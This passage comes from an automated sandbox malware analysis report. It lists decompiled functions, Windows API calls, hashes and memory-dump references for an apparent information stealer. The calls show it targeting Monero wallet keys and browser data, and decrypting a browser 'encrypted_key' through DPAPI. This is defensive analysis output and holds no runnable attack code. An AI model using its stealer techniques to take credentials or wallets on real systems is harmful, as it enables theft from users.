                              • Instruction ID: cc947b8b3be8f35db3bd43e1160cd6abd50b9e3d3e16206ebe1332f760c89b35
                              • Opcode Fuzzy Hash: 21f9ab62abf70cfea518c61373aa373181177b680eb8d43e5419c95b742db0eb
                              • Instruction Fuzzy Hash: DBE08670A40208BFC700DBD4DD09E597BBCEB45702F004054FD0A97240DAB16E008F52
                              Function 0012A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                                • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                                • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                                • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                                • Part of subcall function 00138B60: GetSystemTime.KERNEL32(00140E1A,00FFA990,001405AE,?,?,001213F9,?,0000001A,00140E1A,00000000,?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 00138B86
                                • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                                • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0012A2E1
                              • lstrlen.KERNEL32(00000000,00000000), ref: 0012A3FF
                              • lstrlen.KERNEL32(00000000), ref: 0012A6BC
                                • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                              • DeleteFileA.KERNEL32(00000000), ref: 0012A743
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 268392614299d31eb2e6e3c326f09e400d7a2e9cd515302e39ac27849f4a9036
                              • Instruction ID: cb65f96fbfefb24f283b584e36ce234e07edb5bf48c144e250cdae337f7f415b
                              • Opcode Fuzzy Hash: 268392614299d31eb2e6e3c326f09e400d7a2e9cd515302e39ac27849f4a9036
                              • Instruction Fuzzy Hash: 2FE1D072810118ABDB05FBA4DCA2EEE733CAF24301F908159F557B6091EF746A4DCB66
                              Function 0012D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                                • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                                • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                                • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                                • Part of subcall function 00138B60: GetSystemTime.KERNEL32(00140E1A,00FFA990,001405AE,?,?,001213F9,?,0000001A,00140E1A,00000000,?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 00138B86
                                • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                                • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0012D481
                              • lstrlen.KERNEL32(00000000), ref: 0012D698
                              • lstrlen.KERNEL32(00000000), ref: 0012D6AC
                              • DeleteFileA.KERNEL32(00000000), ref: 0012D72B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: fc17b68090d64dd29390136b2c389b9d493252ae4615b2ba67f3d320d8be6402
                              • Instruction ID: 8546b287c802621bc0cf6714b21197deadef3bb3b33ce0a4ca3b3e6efbb54fbf
                              • Opcode Fuzzy Hash: fc17b68090d64dd29390136b2c389b9d493252ae4615b2ba67f3d320d8be6402
                              • Instruction Fuzzy Hash: 1E911772910108ABDB05FBA4DC96EEE733CAF24305F908158F547B7091EF746A49CB62
                              Function 0012D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                                • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                                • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                                • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                                • Part of subcall function 00138B60: GetSystemTime.KERNEL32(00140E1A,00FFA990,001405AE,?,?,001213F9,?,0000001A,00140E1A,00000000,?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 00138B86
                                • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                                • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0012D801
                              • lstrlen.KERNEL32(00000000), ref: 0012D99F
                              • lstrlen.KERNEL32(00000000), ref: 0012D9B3
                              • DeleteFileA.KERNEL32(00000000), ref: 0012DA32
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: adc5d87fa4b6d630dd6bfc1e6393d81b54b2abf743f1327c3952232ae7ddbf0c
                              • Instruction ID: 0fd299f3ae42378527bf85d0bacfe53e61d9c6e2c53855bfdf7dc01e62594fe6
                              • Opcode Fuzzy Hash: adc5d87fa4b6d630dd6bfc1e6393d81b54b2abf743f1327c3952232ae7ddbf0c
                              • Instruction Fuzzy Hash: 6B811572910118ABDB05FBA4DC96EEE733CAF24301F904568F547B7091EF746A09DBA2
                              Function 0012F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                                • Part of subcall function 001299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001299EC
                                • Part of subcall function 001299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00129A11
                                • Part of subcall function 001299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00129A31
                                • Part of subcall function 001299C0: ReadFile.KERNEL32(000000FF,?,00000000,0012148F,00000000), ref: 00129A5A
                                • Part of subcall function 001299C0: LocalFree.KERNEL32(0012148F), ref: 00129A90
                                • Part of subcall function 001299C0: CloseHandle.KERNEL32(000000FF), ref: 00129A9A
                                • Part of subcall function 00138E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00138E52
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                                • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                                • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                                • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                                • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                                • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                              • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00141580,00140D92), ref: 0012F54C
                              • lstrlen.KERNEL32(00000000), ref: 0012F56B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                              • String ID: ^userContextId=4294967295$moz-extension+++
                              • API String ID: 998311485-3310892237
                              • Opcode ID: 3bd715fe8655244bb68249ee062c14270563e4b2f26bef0abbe2a7a4ffccde74
                              • Instruction ID: b55d72606e14c63905c0263a9cf55cade023cdc2bec841cd2c73fbefa65b76a8
                              • Opcode Fuzzy Hash: 3bd715fe8655244bb68249ee062c14270563e4b2f26bef0abbe2a7a4ffccde74
                              • Instruction Fuzzy Hash: 1B51E171D10108ABDB04FBF4EC96DED7379AF64300F808568F956A7191EF346A19CBA2
                              Function 00133560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: de051aaaf1f13d6950395b75a2cccff23ab5f8e7239c63f3b5b7180c243c48f1
                              • Instruction ID: 2e63ed2acd2df73d0b83a03c27ff86f52707bcfa3cf35a90715b47d73d376e35
                              • Opcode Fuzzy Hash: de051aaaf1f13d6950395b75a2cccff23ab5f8e7239c63f3b5b7180c243c48f1
                              • Instruction Fuzzy Hash: ED4172B1D10109AFCB04EFE5D886AFEB774AF58304F408418F51677251DB75AA09CFA6
                              Function 00129CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                                • Part of subcall function 001299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001299EC
                                • Part of subcall function 001299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00129A11
                                • Part of subcall function 001299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00129A31
                                • Part of subcall function 001299C0: ReadFile.KERNEL32(000000FF,?,00000000,0012148F,00000000), ref: 00129A5A
                                • Part of subcall function 001299C0: LocalFree.KERNEL32(0012148F), ref: 00129A90
                                • Part of subcall function 001299C0: CloseHandle.KERNEL32(000000FF), ref: 00129A9A
                                • Part of subcall function 00138E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00138E52
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00129D39
                                • Part of subcall function 00129AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00124EEE,00000000,00000000), ref: 00129AEF
                                • Part of subcall function 00129AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00124EEE,00000000,?), ref: 00129B01
                                • Part of subcall function 00129AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00124EEE,00000000,00000000), ref: 00129B2A
                                • Part of subcall function 00129AC0: LocalFree.KERNEL32(?,?,?,?,00124EEE,00000000,?), ref: 00129B3F
                                • Part of subcall function 00129B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00129B84
                                • Part of subcall function 00129B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00129BA3
                                • Part of subcall function 00129B60: LocalFree.KERNEL32(?), ref: 00129BD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              • Opcode ID: c873ca61742c96c31498d4a15500b8eb8ae758db284da197ec43ee85959320ab
                              • Instruction ID: 388b7fd6718e6a016569780c2a3756536e966509865bfa4bbf59caf5ee809958
                              • Opcode Fuzzy Hash: c873ca61742c96c31498d4a15500b8eb8ae758db284da197ec43ee85959320ab
                              • Instruction Fuzzy Hash: 74311CB6D1021DABCF04DBE8EC85FEEB7B8AF58304F144519E905A7241EB709A54CBA1
                              Function 00138680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,001405B7), ref: 001386CA
                              • Process32First.KERNEL32(?,00000128), ref: 001386DE
                              • Process32Next.KERNEL32(?,00000128), ref: 001386F3
                                • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                                • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                                • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                              • CloseHandle.KERNEL32(?), ref: 00138761
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: bf8071f652ef7841f4cc3299d500f7ed52a4139b731ab474d8aa5c6757a25477
                              • Instruction ID: daddc130a7366ff92a93d048a902fa16e988096b1ab6040cabcdab4ac9f762c1
                              • Opcode Fuzzy Hash: bf8071f652ef7841f4cc3299d500f7ed52a4139b731ab474d8aa5c6757a25477
                              • Instruction Fuzzy Hash: 96316871901218ABCB25EF90DC91FEEB778EF59700F5081A9F10AB21A0DB706A45CFA1
                              Function 00137980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00140E00,00000000,?), ref: 001379B0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001379B7
                              • GetLocalTime.KERNEL32(?,?,?,?,?,00140E00,00000000,?), ref: 001379C4
                              • wsprintfA.USER32 ref: 001379F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: 5ba5530d34ab1190a7a4d648cc9913f2eba15daaf4dc5b1b4581749705702735
                              • Instruction ID: 691ec6cdae4f213b9700234fccd63293175673b5c5eca9f6645c2b8ea2915c06
                              • Opcode Fuzzy Hash: 5ba5530d34ab1190a7a4d648cc9913f2eba15daaf4dc5b1b4581749705702735
                              • Instruction Fuzzy Hash: D51118B2904518AACB149FC9ED45BBEBBFCEB48B11F10411AF605A2280D3795940CBB1
                              Function 001392E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(00133AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00133AEE,?), ref: 001392FC
                              • GetFileSizeEx.KERNEL32(000000FF,00133AEE), ref: 00139319
                              • CloseHandle.KERNEL32(000000FF), ref: 00139327
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID:
                              • API String ID: 1378416451-0
                              • Opcode ID: ae1bb899389c2c1ba8528cbf6dbf0585b51dff921dab19de5dd5a5b4b783e74c
